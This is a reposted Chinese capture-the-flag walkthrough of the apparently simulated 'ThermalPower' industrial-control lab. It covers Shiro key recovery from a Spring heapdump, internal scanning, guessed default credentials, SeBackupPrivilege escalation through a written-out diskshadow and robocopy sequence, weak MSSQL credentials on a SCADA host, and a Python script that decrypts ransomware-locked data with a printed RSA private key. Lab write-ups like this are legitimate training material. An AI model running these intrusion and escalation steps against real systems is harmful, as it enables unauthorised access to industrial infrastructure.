ThermalPower

admin 2025年1月17日08:39:57评论2 views字数 5801阅读19分20秒阅读模式

外网

remember,shiro框架

ThermalPower
image-20250116221820181

工具扫描

看到heapdump,盲猜解密得到key,shiro一把梭

ThermalPower
image-20250116222109693
ThermalPower
image-20250116222303795

QZYysgMYhG6/CzIJlVpR2g==

ThermalPower
image-20250116222529197

果真一把梭

ThermalPower
image-20250116222827760
ThermalPower
image-20250116222834400

内网代理

ThermalPower
image-20250116223146362
ThermalPower
image-20250116223249617

fscan扫内网

172.22.17.213:8080 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.213:22 open
172.22.17.6:21 open
[*] NetInfo 
[*]172.22.17.6
   [->]WIN-ENGINEER
   [->]172.22.17.6
[*] NetBios 172.22.17.6     WORKGROUPWIN-ENGINEER        
[*] WebTitle http://172.22.17.213:8080 code:302 len:0      title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=4C3BE6927F06F140583A6F32A7094EA4
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=4C3BE6927F06F140583A6F32A7094EA4 code:200 len:2936   title:火创能源监控画面管理平台
[+] ftp 172.22.17.6:21:anonymous 
   [->]Modbus
   [->]PLC
   [->]web.config
   [->]WinCC
   [->]内部软件
   [->]火创能源内部资料
[*] WebTitle http://172.22.17.6        code:200 len:661    title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file 
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2

开全局流量转发,访问泄露的敏感区域得到账号密码

ThermalPower
image-20250116223519545

及其他信息总结得到

例如,张三的账户名为zhangsan,工号为0801。初始密码将由账户名+@+工号组成,例如,zhangsan@0801。

chenhua/chenhua@0813

mstsc连接

ThermalPower
image-20250116224519791

提权

查看 SeBackupPrivilege 的状态

ThermalPower
image-20250116224958166
Import-Module .EnableSeBackupPrivilege.ps1
cd C:
mkdir tmp
diskshadow /s s.dsh
robocopy /b z:UsersAdministratorflag . flag02.txt

s.dsh

set context persistent nowriters
add volume c: alias mydrive
create
expose %mydrive% z:

拿到flag2

ThermalPower
image-20250116232238109

172.22.26.xx

fscan扫敏感区域泄露网段

172.22.26.11:80 open
172.22.26.11:445 open
172.22.26.11:1433 open
172.22.26.11:139 open
172.22.26.11:135 open
[*] NetBios 172.22.26.11    WORKGROUPWIN-SCADA           
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo 
[*]172.22.26.11
   [->]WIN-SCADA
   [->]172.22.26.11
[*] WebTitle http://172.22.26.11       code:200 len:703    title:IIS Windows Server

继续连接

ThermalPower
image-20250116233058115

等待加载,点击锅炉开得到flag

ThermalPower
image-20250116233148843

勒索病毒

返回桌面发现勒索

ThermalPower
image-20250116233315748

navi找到第四个flag,但是空

ThermalPower
image-20250116233559474

分析exe文件

使用AEScrypto加密

ThermalPower
image-20250116234943599

百度网盘给了这两个文件

encryptedAesKey是AES_KEY_ENC

privateKey是PRIVATE_KEY

  • 首先用 privateKey 对加密的 encryptedAesKey进行 RSA 解密,得到 AES_KEY
  • 再用 AES_KEY 对加密的文件 ScadaDB.sql.locky 解密,得到 ScadaDB.sql

xml转pem格式得到

-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----

rsa解密得到

cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=

ThermalPower
image-20250116235739286

解密sql文件

# -*- coding: utf-8 -*-
# @Author  : iker
# @Time    : 2024/03/04 16:10
# @Function: RSA Privatekey Decryption & AES CBC Decryption
import base64
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5


defrsa_decrypt(data):
    private_key = """-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----"""

    data = base64.b64decode(data)
    priobj = Cipher_pkcs1_v1_5.new(RSA.importKey(private_key))
    decrypted_data = priobj.decrypt(data,None)
return decrypted_data


defpadding(data):
# style(string) – Padding algorithm.It can be ‘pkcs7’ (default), ‘iso7816’ or ‘x923’.
if len(data) % AES.block_size != 0:
return pad(data, AES.block_size, 'pkcs7')
else:
return data

defaes_cbc_encrypt(iv, key, data):
    key = padding(key)
    data = padding(data)
    iv = padding(iv)

    aes = AES.new(key, AES.MODE_CBC, iv)
    cipher_data = aes.encrypt(data)
return cipher_data

defaes_cbc_decrypt(iv, key, data):
    iv = padding(iv)
    key = padding(key)
    data = padding(data)

    aes = AES.new(key, AES.MODE_CBC, iv)
    data = aes.decrypt(data)
return data

defdecrypt_file(encrypted_filepath,output_filepath,key):
with open(encrypted_filepath, 'rb'as f:
        data = f.read()

    iv = b'x00' * 16
    decryption_result = aes_cbc_decrypt(iv, key, data)

with open(output_filepath, 'wb'as f:
        f.write(decryption_result)

if __name__ == "__main__":
    encryptedAesKey = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="
    key = rsa_decrypt(encryptedAesKey)
    encrypted_filepath = "ScadaDB.sql.locky"
    output_filepath = "ScadaDB.sql"
    decrypt_file(encrypted_filepath,output_filepath,key)

最终

ThermalPower
image-20250117000252549
ThermalPower
image-20250117000322632

原文始发于微信公众号(flowers-boy):ThermalPower

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月17日08:39:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ThermalPowerhttps://cn-sec.com/archives/3637001.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息